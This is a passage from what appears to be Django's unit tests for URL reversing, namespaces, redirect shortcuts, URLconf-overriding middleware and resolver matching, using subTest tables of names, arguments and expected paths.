with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse('name', args=['a'], kwargs={'b': 'c'})
@override_script_prefix('/{{invalid}}/')
def test_prefix_braces(self):
self.assertEqual(
'/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include')
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix('/bogus)/'):
self.assertEqual(
'/bogus)/includes/non_path_include/',
reverse('non_path_include')
)
with override_script_prefix('/(bogus)/'):
self.assertEqual(
'/(bogus)/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/bump%20map/')
def test_prefix_format_char(self):
self.assertEqual(
'/bump%2520map/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/%7Eme/')
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix('/script:name/')
def test_script_name_escaping(self):
self.assertEqual(
reverse('optional', args=['foo:bar']),
'/script:name/optional/foo:bar/'
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('nonexistent-view')
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places')
def test_illegal_args_message(self):
msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', args=(1, 2))
def test_illegal_kwargs_message(self):
msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<URLPattern list>', repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = 'urlpatterns_reverse.named_urls'
proxy_url = reverse_lazy('named-url1', urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver('urlpatterns_reverse.named_urls')
test_urls = [
# (name, args, kwargs, expected)
('named-url1', (), {}, ''),
('named-url2', ('arg',), {}, 'extra/arg/'),
('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
('name-conflict', (), {}, 'conflict/'),
# With an arg, the last URL in urlpatterns has precedence.
('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
# With a kwarg, other URL patterns can be reversed.
('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
# The number and order of the arguments don't interfere with reversing.
('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ['', 'a', '\\', '.']
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{'type': URLPattern, 'name': 'named-url1'}],
[{'type': URLPattern, 'name': 'named-url2'}],
[{'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLResolver}],
]
with self.assertRaisesMessage(Resolver404, 'tried') as cm:
resolve('/included/nonexistent-url', urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn('tried', e.args[0])
self.assertEqual(
len(e.args[0]['tried']),
len(url_types_names),
'Wrong number of tried URLs returned. Expected %s, got %s.' % (
len(url_types_names), len(e.args[0]['tried'])
)
)
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
self.assertIsInstance(t, e['type']), '%s is not an instance of %s' % (t, e['type'])
if 'name' in e:
if not e['name']:
self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(
t.name,
e['name'],
'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name)
)
def test_namespaced_view_detail(self):
resolver = get_resolver('urlpatterns_reverse.nested_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver('urlpatterns_reverse.method_view_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.force_login(alfred)
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
'Some URL: %s' % reverse_lazy('some-login-page'),
'Some URL: /login/'
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get('/')
self.assertEqual(
request.build_absolute_uri(reverse_lazy('some-login-page')),
'http://testserver/login/',
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
'settings.py',
extra="from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')",
)
def test_lazy_in_settings(self):
out, err = self.run_manage(['check'])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
with self.assertRaises(NoReverseMatch):
redirect('not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
# Assert that we can redirect using UTF-8 strings
res = redirect('/æøå/abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5/abc/')
# Assert that no imports are attempted when dealing with a relative path
# (previously, the below would resolve in a UnicodeEncodeError from __import__ )
res = redirect('/æøå.abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5.abc/')
res = redirect('os.path')
self.assertEqual(res.url, 'os.path')
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), '/includes/nested_path/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('urlobject-view', [], {}),
('urlobject-view', [37, 42], {}),
('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('inner-nothing', [], {}),
('inner-nothing', [37, 42], {}),
('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
'blahblah:urlobject-view',
'test-ns1:blahblah:urlobject-view',
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
('normal-view', [], {}, '/normal/'),
('normal-view', [37, 42], {}, '/normal/37/42/'),
('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
('special-view', [], {}, '/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
('newapp:urlobject-view', [], {}, '/new-default/inner/'),
('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
(
'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/included/test3/inner/42/37/',
),
('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/test3/inner/42/37/',
),
('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
('testapp:urlobject-view', [], {}, '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_special_chars_namespace(self):
test_urls = [
('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
(
'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
'/+%5C$*/included/normal/42/37/',
),
('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
(
'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/37/42/',
),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
Test reversing an URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get('/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
Test reversing an URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
self.client.get(reverse('inner'))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = URLResolver(RegexPattern(r'^$'), urlconf)
self.callable_resolver = URLResolver(RegexPattern(r'^$'), urlconf_callables)
def test_named_handlers(self):
handler = (empty_view, {})
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.resolver.resolve_error_handler(code), handler)
def test_callable_handlers(self):
handler = (empty_view, {})
for code in [400, 404, 500]:
with self.subTest(code=code):
self.assertEqual(self.callable_resolver.resolve_error_handler(code), handler)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls_without_handlers')
class DefaultErrorHandlerTests(SimpleTestCase):
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
msg = "I don't think I'm getting good value for this view"
with self.assertRaisesMessage(ValueError, msg):
self.client.get('/bad_view/')
@override_settings(ROOT_URLCONF=None)
class NoRootUrlConfTests(SimpleTestCase):
"""Tests for handler404 and handler500 if ROOT_URLCONF is None"""
def test_no_handler_exception(self):
msg = (
"The included URLconf 'None' does not appear to have any patterns "
"in it. If you see valid patterns in the file then the issue is "
"probably caused by a circular import."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.client.get('/test/me/')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for path_, url_name, app_name, namespace, view_name, func, args, kwargs in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
